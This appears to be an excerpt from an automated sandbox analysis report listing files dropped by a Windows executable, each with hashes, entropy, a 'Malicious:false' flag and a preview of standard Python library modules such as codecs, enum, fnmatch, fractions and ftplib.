                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""..Python 'utf-32' Codec.."""..import codecs, sys....### Codec APIs....encode = codecs.utf_32_encode....def decode(input, errors='strict'):.. return codecs.utf_32_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. codecs.IncrementalEncoder.__init__(self, errors).. self.encoder = None.... def encode(self, input, final=False):.. if self.encoder is None:.. result = codecs.utf_32_encode(input, self.errors)[0].. if sys.byteorder == 'little':.. self.encoder = codecs.utf_32_le_encode.. else:.. self.encoder = codecs.utf_32_be_encode.. return result.. return self.encoder(input, self.errors)[0].... def reset(self):.. codecs.IncrementalEncoder.reset(self).. self.encoder = None.... def getstate(self):.. # state info we return to the caller:.. # 0: stream is in natural order for th
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):967
                                                                                                                                                                                                                                  Entropy (8bit):4.64840879615024
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:g6VyWEq1IjsatMufQ3b+OyWi0kzyWWzryWF9ZKj9KJxFplR:gRq1IQaCusKzwzXTKYJxTz
                                                                                                                                                                                                                                  MD5:85519A8598572F85931621ACCB60DB87
                                                                                                                                                                                                                                  SHA1:2B7912D3F1D4042A0778C22C068A18A9AD00B990
                                                                                                                                                                                                                                  SHA-256:A3698A68287CC78323117D14BE3B0B40F46289A850EB06AA9A5328D44B2A30EF
                                                                                                                                                                                                                                  SHA-512:AAF1FB52FCB6BCE9D3E026BD4866149D48F5E2434A735DED9165C65A5FD4D0186CC44715A797A890F4E01C9E4CB44453BCA8D4BA6993B93811739CA80E86F5FA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""..Python 'utf-32-be' Codec.."""..import codecs....### Codec APIs....encode = codecs.utf_32_be_encode....def decode(input, errors='strict'):.. return codecs.utf_32_be_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_32_be_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_32_be_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_32_be_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_32_be_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-32-be',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReader,.. streamwriter=StreamWriter,.. )..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):967
                                                                                                                                                                                                                                  Entropy (8bit):4.629711576470682
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:gEVyWWq1IjyatMufQpb+OyWE0kzyWczryWj9ZKj95WJxFplR:g5q1IeaCuG8zizhTKGJxTz
                                                                                                                                                                                                                                  MD5:6647D201D3BAD385BD7897DF02EC45ED
                                                                                                                                                                                                                                  SHA1:AADB093709162E4B5F9ABA0590235AFE3D96246B
                                                                                                                                                                                                                                  SHA-256:945AF03D1DA591640DE7176BEF879658594B399AC7BBE564D790893CA7B38A73
                                                                                                                                                                                                                                  SHA-512:CF7F010E0E199BD017636894D7B1B060E21D2ADF13D81BAE710046889D48604A01D05F10F1B1ACA8033F19E8254857A93334CBBF471E55FD58BD4888B190CE62
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""..Python 'utf-32-le' Codec.."""..import codecs....### Codec APIs....encode = codecs.utf_32_le_encode....def decode(input, errors='strict'):.. return codecs.utf_32_le_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_32_le_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_32_le_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_32_le_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_32_le_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-32-le',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReader,.. streamwriter=StreamWriter,.. )..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):984
                                                                                                                                                                                                                                  Entropy (8bit):4.635801396513396
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:JWyVyW6q1IjWatMufQVb+OyWg0kzyW4zryWH9ZKj9+5JxFplR:JWjq1IiaCu24zmzNTK85JxTz
                                                                                                                                                                                                                                  MD5:ECFD453A49D4C576E4F189CF6B23376C
                                                                                                                                                                                                                                  SHA1:70B61C19024F20BBC476C11D3CE95AA484225D09
                                                                                                                                                                                                                                  SHA-256:1BE7FC4C85EDAAB33427D3F1230D56B8A4B0D75566F726D9DFC50FACEA36688B
                                                                                                                                                                                                                                  SHA-512:F6AB67F17F586459362581DD894D3CAF62D67E283C075DFCD15B2D03E0AC79FF53E31853900A9EFF5E8778ECEC7AEE7A945EA55368D663FF82F657E7950B4A51
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python 'utf-7' Codec....Written by Brian Quinlan (brian@sweetapp.com)..."""..import codecs....### Codec APIs....encode = codecs.utf_7_encode....def decode(input, errors='strict'):.. return codecs.utf_7_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_7_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_7_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_7_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_7_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-7',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReader,.. streamwriter=StreamWriter,.. )..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1047
                                                                                                                                                                                                                                  Entropy (8bit):4.729776202710733
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:JgqSEVyW7yEq1IjPatMufQ7y3b+OyWR0kzyW7yWzryWc9ZKj9/JxFplR:J1SKyEq1IjaCuwyr5z1yWzeTKZJxTz
                                                                                                                                                                                                                                  MD5:F932D95AFCAEA5FDC12E72D25565F948
                                                                                                                                                                                                                                  SHA1:2685D94BA1536B7870B7172C06FE72CF749B4D29
                                                                                                                                                                                                                                  SHA-256:9C54C7DB8CE0722CA4DDB5F45D4E170357E37991AFB3FCDC091721BF6C09257E
                                                                                                                                                                                                                                  SHA-512:A10035AE10B963D2183D31C72FF681A21ED9E255DDA22624CBAF8DBED5AFBDE7BE05BB719B07573DE9275D8B4793D2F4AEF0C0C8346203EEA606BB818A02CAB6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python 'utf-8' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....encode = codecs.utf_8_encode....def decode(input, errors='strict'):.. return codecs.utf_8_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_8_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_8_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_8_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_8_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-8',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReade
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4263
                                                                                                                                                                                                                                  Entropy (8bit):4.440495855479389
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:JGJ9aCCIFyqPICuY5lRlDrwzRC35v5lLo3YCaLt3AvBNiLD1Lg9Ft1QYxTKB3:8J9vCIFTwCuolR9rwzRCJhlLIaLtQv+d
                                                                                                                                                                                                                                  MD5:99B035D3C80B206F86E525A4DB7704D3
                                                                                                                                                                                                                                  SHA1:5006274B7CC61564CF6839AC070631F788FD5FCB
                                                                                                                                                                                                                                  SHA-256:21A95BB95448F2F064F08AA2C89E843B87A20A5A13C45C6C47C288F2BE5219A4
                                                                                                                                                                                                                                  SHA-512:B19A6876EB04CD5739F99C7C0A07B2269E2EB9A72199A656149DD2B87A25EB0F9945CD9CAEFD2B7DA8756386468294493C6353645CB055343F008CDCFF115F4F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python 'utf-8-sig' Codec..This work similar to UTF-8 with the following changes:....* On encoding/writing a UTF-8 encoded BOM will be prepended/written as the.. first three bytes.....* On decoding/reading if the first three bytes are a UTF-8 encoded BOM, these.. bytes will be skipped..."""..import codecs....### Codec APIs....def encode(input, errors='strict'):.. return (codecs.BOM_UTF8 + codecs.utf_8_encode(input, errors)[0],.. len(input))....def decode(input, errors='strict'):.. prefix = 0.. if input[:3] == codecs.BOM_UTF8:.. input = input[3:].. prefix = 3.. (output, consumed) = codecs.utf_8_decode(input, errors, True).. return (output, consumed+prefix)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. codecs.IncrementalEncoder.__init__(self, errors).. self.first = 1.... def encode(self, input, final=False):.. if self.first:.. self.first = 0.. r
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2954
                                                                                                                                                                                                                                  Entropy (8bit):4.703525654326454
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:XnE2/bf1OV5FPdLLlKTOARSMoxz1AFPLpLGpW7NRp6/df1Fo141RzuwBvIvPTKrf:XESf1OVjPpUOAoMot8P1HJydf/omXu+P
                                                                                                                                                                                                                                  MD5:C62CEDA36D6B362A2250094DFA2EF15A
                                                                                                                                                                                                                                  SHA1:D96068DC9790D38B44F3DA580F134EF1C7288B33
                                                                                                                                                                                                                                  SHA-256:3991C68ACBB5CE946C6BA71CCB044FBBB449F9EAC9B76262456537EAEBEF9340
                                                                                                                                                                                                                                  SHA-512:6C0296817CA26680858DB78B38BF1D1BE39FC7EDB7894979251EA3281496E7447914A12C9C5B41A1EAD12610DD472C00FF9752816FE30CFF4298C083DA29B3A3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Python 'uu_codec' Codec - UU content transfer encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com). Some details were..adapted from uu.py which was written by Lance Ellinghouse and..modified by Jack Jansen and Fredrik Lundh..."""....import codecs..import binascii..from io import BytesIO....### Codec APIs....def uu_encode(input, errors='strict', filename='<data>', mode=0o666):.. assert errors == 'strict'.. infile = BytesIO(input).. outfile = BytesIO().. read = infile.read.. write = outfile.write.... # Remove newline chars from filename.. filename = filename.replace('\n','\\n').. filename = filename.replace('\r','\\r').... # Encode.. write(('begin %o %s\n' % (mode & 0o777, filename)).encode('ascii')).. chunk = read(45).. while chunk:.. write(binascii.b2a_uu(chunk)).. chunk = read(45).. write(b' \nend\n').... return (outfile.getvalue(), len(input))....def uu_decode(input, error
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2281
                                                                                                                                                                                                                                  Entropy (8bit):4.555875191198799
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:XLDD4W1AIejO1AI73101ouY51wdP7z0I51wzD5x6Ftx0+HvIvPTKyJxTPH:XHD4W/ejO/73OauY5y7z/58uXnA3TKyD
                                                                                                                                                                                                                                  MD5:77C7F92636D3B55460B5E1AFD451D5DB
                                                                                                                                                                                                                                  SHA1:DCE6B27A30BC191F9CFA34DEA5A27682AE274DE4
                                                                                                                                                                                                                                  SHA-256:9B660028249BDB7E9B80AF1D5432BF0C90B132A6D0DD205E2DED2A3B3275B728
                                                                                                                                                                                                                                  SHA-512:93E2E6197321CAD932F88F234EBFAD23F88ABB00C18D2F80C5711D15119CA4D0D1AB261156D6E9A7E1FEEA8A30675759823A3353F353551BA887101CDBBFA98D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Python 'zlib_codec' Codec - zlib compression encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs..import zlib # this codec needs the optional zlib module !....### Codec APIs....def zlib_encode(input, errors='strict'):.. assert errors == 'strict'.. return (zlib.compress(input), len(input))....def zlib_decode(input, errors='strict'):.. assert errors == 'strict'.. return (zlib.decompress(input), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return zlib_encode(input, errors).. def decode(self, input, errors='strict'):.. return zlib_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. assert errors == 'strict'.. self.errors = errors.. self.compressobj = zlib.compressobj().... def encode(self, input, final=False):.. if final:.. c
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):40884
                                                                                                                                                                                                                                  Entropy (8bit):4.212002396918681
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:kSaCRtqc9awL8yzjb4IuSzIcvYFgvHEo0FBbefYu4V+QOxTCe7IpW3W+KP4qxkIr:kShRtqcdp43cvcZFBNFdaI5h/EiAi
                                                                                                                                                                                                                                  MD5:F87CAC79AB835BAC55991134E9C64A35
                                                                                                                                                                                                                                  SHA1:63D509BF705342A967CDD1AF116FE2E18CD9346F
                                                                                                                                                                                                                                  SHA-256:303AFEA74D4A1675A48C6A8D7C4764DA68DBEF1092DC440E4BF3C901F8155609
                                                                                                                                                                                                                                  SHA-512:9A087073E285F0F19AB210ECEEFB9E2284FFFD87C273413E66575491023A8DCB4295B7C25388F1C2E8E16A74D3B3BFF13EC725BE75DC827541E68364E3A95A6D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import sys..from types import MappingProxyType, DynamicClassAttribute......__all__ = [.. 'EnumMeta',.. 'Enum', 'IntEnum', 'Flag', 'IntFlag',.. 'auto', 'unique',.. ]......def _is_descriptor(obj):.. """.. Returns True if obj is a descriptor, False otherwise... """.. return (.. hasattr(obj, '__get__') or.. hasattr(obj, '__set__') or.. hasattr(obj, '__delete__').. )....def _is_dunder(name):.. """.. Returns True if a __dunder__ name, False otherwise... """.. return (.. len(name) > 4 and.. name[:2] == name[-2:] == '__' and.. name[2] != '_' and.. name[-3] != '_'.. )....def _is_sunder(name):.. """.. Returns True if a _sunder_ name, False otherwise... """.. return (.. len(name) > 2 and.. name[0] == name[-1] == '_' and.. name[1:2] != '_' and.. name[-2:-1] != '_'.. )....def _is_priv
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10491
                                                                                                                                                                                                                                  Entropy (8bit):4.527930173678213
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:S4TNBBnKhVsBrA7go4ly/vF1AUCzRUYqRvmC14ziCI6mM/MXiYPWEiOVtYhV+BdI:SWZvoF/vrierHCJmM/MltcV+T9x9FxS
                                                                                                                                                                                                                                  MD5:5BFEBC272A65E815586C0B477529A23B
                                                                                                                                                                                                                                  SHA1:ABFDCD66A595B8E4FBD983F02DB3E3E17EFBE7D2
                                                                                                                                                                                                                                  SHA-256:DF39A8D67A582E8E4F54B665B7FD5D87E0754982AC5FBDD6CED3E09039CDAE8D
                                                                                                                                                                                                                                  SHA-512:04B93F5EAD263FF9889AE3CF97950263559EA8F454594A21F2041973B0DD340564DF5A4F1BEDFA313FDD25BBAB0013ED29FAA3FF911CE9A931C3C3631F4407B8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Utilities for comparing files and directories.....Classes:.. dircmp....Functions:.. cmp(f1, f2, shallow=True) -> int.. cmpfiles(a, b, common) -> ([], [], []).. clear_cache()...."""....import os..import stat..from itertools import filterfalse..from types import Generiuseras....__all__ = ['clear_cache', 'cmp', 'dircmp', 'cmpfiles', 'DEFAULT_IGNORES']...._cache = {}..BUFSIZE = 8*1024....DEFAULT_IGNORES = [.. 'RCS', 'CVS', 'tags', '.git', '.hg', '.bzr', '_darcs', '__pycache__']....def clear_cache():.. """Clear the filecmp cache.""".. _cache.clear()....def cmp(f1, f2, shallow=True):.. """Compare two files..... Arguments:.... f1 -- First file name.... f2 -- Second file name.... shallow -- treat files as identical if their stat signatures (type, size,.. mtime) are identical. Otherwise, files are considered different.. if their sizes or contents differ. [default: True].... Return value:.... True if the files are the same
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16904
                                                                                                                                                                                                                                  Entropy (8bit):4.324042229701554
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:aPuyi2h40tVqXZqRPUJeRalQFufMR2RgzRXhRWRhRHR8p8ido/5V6E0j0ZP5Od/C:muy7h40QZqR/nFufe8gNXXcXx4oVPZPn
                                                                                                                                                                                                                                  MD5:53551CACE03FF1ECBAF2BB02E0F07F1E
                                                                                                                                                                                                                                  SHA1:06C4B1BA4C943CC08A468E5603AEFE7FAEAEFD20
                                                                                                                                                                                                                                  SHA-256:8EE12B8E0A09A58129E2AB4D12FA1B132054F12C4090F7FACB943A163C09710F
                                                                                                                                                                                                                                  SHA-512:EB108AA2557C4A556EF2CDAEFBA2CEC5A95AB2B72DFFCF9B2F96A6199E4202189CAF2E432A67FC907C3FC604EFB7ECE50D859A471D2DB26DFF8C6D0212BB2709
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Helper class to quickly write a loop over all standard input files.....Typical use is:.... import fileinput.. for line in fileinput.input(encoding="utf-8"):.. process(line)....This iterates over the lines of all files listed in sys.argv[1:],..defaulting to sys.stdin if the list is empty. If a filename is '-' it..is also replaced by sys.stdin and the optional arguments mode and..openhook are ignored. To specify an alternative list of filenames,..pass it as the argument to input(). A single file name is also allowed.....Functions filename(), lineno() return the filename and cumulative line..number of the line that has just been read; filelineno() returns its..line number in the current file; isfirstline() returns true iff the..line just read is the first line of its file; isstdin() returns true..iff the line was read from sys.stdin. Function nextfile() closes the..current file so that the next iteration will read the first line from..the next file (if any); lines not
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6912
                                                                                                                                                                                                                                  Entropy (8bit):4.406960177155352
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:mgdA3GVpoP8oQAhpt4CLJzovn6WkPmByCJi9Xknf06hAIbFR4E:X4CFaJQyCJi9Xkf7x
                                                                                                                                                                                                                                  MD5:9EDB2D03A76A80ABE64419ACA82EB8A9
                                                                                                                                                                                                                                  SHA1:1F4C2A1965749322D8F00A09B2F9C5CEBC10D838
                                                                                                                                                                                                                                  SHA-256:99069DC503E3AA219B5948A5795F1E03A2D4D16786707F7AC10684B4486B66CE
                                                                                                                                                                                                                                  SHA-512:456828214E46FF835BE80BCB047A044EE3DA189992E7A84D79DD35D61A6737DAF523F8550DEE6B92E926BD3CBF50F40F09DCB78D1D136FCFCB21B253DFDFC8C5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Filename matching with shell patterns.....fnmatch(FILENAME, PATTERN) matches according to the local convention...fnmatchcase(FILENAME, PATTERN) always takes case in account.....The functions operate by translating the pattern into a regular..expression. They cache the compiled regular expressions for speed.....The function translate(PATTERN) returns a regular expression..corresponding to PATTERN. (It does not compile it.).."""..import os..import posixpath..import re..import functools....__all__ = ["filter", "fnmatch", "fnmatchcase", "translate"]....# Build a thread-safe incrementing counter to help create unique regexp group..# names across calls...from itertools import count.._nextgroupnum = count().__next__..del count....def fnmatch(name, pat):.. """Test whether FILENAME matches PATTERN..... Patterns are Unix shell style:.... * matches everything.. ? matches any single character.. [seq] matches any character in seq.. [!seq] matches any char not i
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28990
                                                                                                                                                                                                                                  Entropy (8bit):4.386995679707714
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:sYYcjYLGi0di34CXYWETikB0040ArA4cwNlxpjOmGa+:sYzsLGi0649J7Qxpsa+
                                                                                                                                                                                                                                  MD5:D79E7362E8855E4216B46F90A2D664DF
                                                                                                                                                                                                                                  SHA1:5580BD5171CED40ADFBF2E95C5DBCEC184A44E20
                                                                                                                                                                                                                                  SHA-256:AF973E4F1A157C6D1AF2F16A63B384A6DFED0D64880A56DB96EA4E0D8D6EB12D
                                                                                                                                                                                                                                  SHA-512:DCF9E0486490263D30B60FC1CF1800A1763B6E3DF23CD77C11CF83D7C1AC8ABB34EBF522895BC88D5F409E59C2D93663926D1CA2FAE520631722FDC45E5106D3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Originally contributed by Sjoerd Mullender...# Significantly modified by Jeffrey Yasskin <jyasskin at gmail.com>....."""Fraction, infinite-precision, real numbers."""....from decimal import Decimal..import math..import numbers..import operator..import re..import sys....__all__ = ['Fraction']......# Constants related to the hash implementation; hash(x) is based..# on the reduction of x modulo the prime _PyHASH_MODULUS..._PyHASH_MODULUS = sys.hash_info.modulus..# Value to be used for rationals that reduce to infinity modulo..# _PyHASH_MODULUS..._PyHASH_INF = sys.hash_info.inf...._RATIONAL_FORMAT = re.compile(r""".. \A\s* # optional whitespace at the start, then.. (?P<sign>[-+]?) # an optional sign, then.. (?=\d|\.\d) # lookahead for digit or .digit.. (?P<num>\d*) # numerator (possibly empty).. (?: # followed by.. (?:/(?P<denom>\d+))? # an optional denominator.. |
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):36477
                                                                                                                                                                                                                                  Entropy (8bit):4.494220235473389
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:xp+qv4dk/rJQJ9+Lx8CDSh8Y+3+amueaw+QHCRi3LdO:xpDTzJQJiDSh8Y+3+fzKEei3L8
                                                                                                                                                                                                                                  MD5:B14842A034453578318FD0ACD801A0CC
                                                                                                                                                                                                                                  SHA1:6E4F32C29E9296DCE1452ACE023894F0E1A8B756
                                                                                                                                                                                                                                  SHA-256:B85739A95BE5A2374013E9892DBFA5AC75312024EF7EBB9BCB4102B0F5BF0F82
                                                                                                                                                                                                                                  SHA-512:58A628BBC100E1CA623ADA41C2E79302B15A1ED6E5920F385ED26B711383C01483F150AB3DFD39C8A07834A1FCA68F90AE3B4F2CCB59DB8280ED812F93320962
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""An FTP client class and some helper functions.....Based on RFC 959: File Transfer Protocol (FTP), by J. Postel and J. Reynolds....Example:....>>> from ftplib import FTP..>>> ftp = FTP('ftp.python.org') # connect to host, default port..>>> ftp.login() # default, i.e.: user anonymous, passwd anonymous@..'230 Guest login ok, access restrictions apply.'..>>> ftp.retrlines('LIST') # list directory contents..total 9..drwxr-xr-x 8 root wheel 1024 Jan 3 1994 ...drwxr-xr-x 8 root wheel 1024 Jan 3 1994 ....drwxr-xr-x 2 root wheel 1024 Jan 3 1994 bin..drwxr-xr-x 2 root wheel 1024 Jan 3 1994 etc..d-wxrwxr-x 2 ftp wheel 1024 Sep 5 13:43 incoming..drwxr-xr-x 2 root wheel 1024 Nov 17 1993 lib..drwxr-xr-x 6 1094 wheel 1024 Sep 13 19:07 pub..drwxr-xr-x 3 root wheel 1024 Jan 3 1994 usr..-rw-r--r-- 1 root root 312 Aug 1 1994 welcome.msg..'226 Transfer complete.'..>>> ft
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39068
                                                                                                                                                                                                                                  Entropy (8bit):4.558893536012342
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:sWkKM+qgJeCAkxPN2NqXBF7sMHrCXZdgbV6TeLCD+26:sWkfgJeCAk7v7sMHrCpEWB6
                                                                                                                                                                                                                                  MD5:E451C9675E4233DE278ACF700AC7395F
                                                                                                                                                                                                                                  SHA1:1E7D4C5DB5FC692540C31E1B4DB4679051EB5DF8
                                                                                                                                                                                                                                  SHA-256:B4698D03B4D366F2B032F5DE66B8181ED8E371C0D7D714B7672432E18D80636B
                                                                                                                                                                                                                                  SHA-512:4DB40159DB7427CE05D36AA3A6B05151742E6C122DFBDC679C10DCC667FC999FF1302BB2E2BE6F58B895911CF436B27AD78FD64CCF077DEB94046667520111B9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""functools.py - Tools for working with functions and callable objects.."""..# Python module wrapper for _functools C module..# to allow utilities written in Python to be added..# to the functools module...# Written by Nick Coghlan <ncoghlan at gmail.com>,..# Raymond Hettinger <python at rcn.com>,..# and .ukasz Langa <lukasz at langa.pl>...# Copyright (C) 2006-2013 Python Software Foundation...# See C source code for _functools credits/copyright....__all__ = ['update_wrapper', 'wraps', 'WRAPPER_ASSIGNMENTS', 'WRAPPER_UPDATES',.. 'total_ordering', 'cache', 'cmp_to_key', 'lru_cache', 'reduce',.. 'partial', 'partialmethod', 'singledispatch', 'singledispatchmethod',.. 'cached_property']....from abc import get_cache_token..from collections import namedtuple..# import types, weakref # Deferred to single_dispatch()..from reprlib import recursive_repr..from _thread import RLock..from types import Generiuseras......#############################################
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5130
                                                                                                                                                                                                                                  Entropy (8bit):4.610395495126573
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:jqn24r0OS60O04+jl2LyqSgPGfGeYM6Zf8lG4iuRs+laP8q+PCI7ocfz/r/j:jq24r0v60hLhWL+fuMeebiuRPr/r/j
                                                                                                                                                                                                                                  MD5:5AD610407613DEFB331290EE02154C42
                                                                                                                                                                                                                                  SHA1:3FF9028BDF7346385607B5A3235F5FF703BCF207
                                                                                                                                                                                                                                  SHA-256:2E162781CD02127606F3F221FCAA19C183672D1D3E20FDB83FE9950AB5024244
                                                                                                                                                                                                                                  SHA-512:9A742C168A6C708A06F4307ABCB92CEDE02400BF53A004669B08BD3757D8DB7C660934474EC379C0464E17FFD25310DBAB525B6991CF493E97DCD49C4038F9B7
                                                                                                                                                                                                                                  Malicious:false
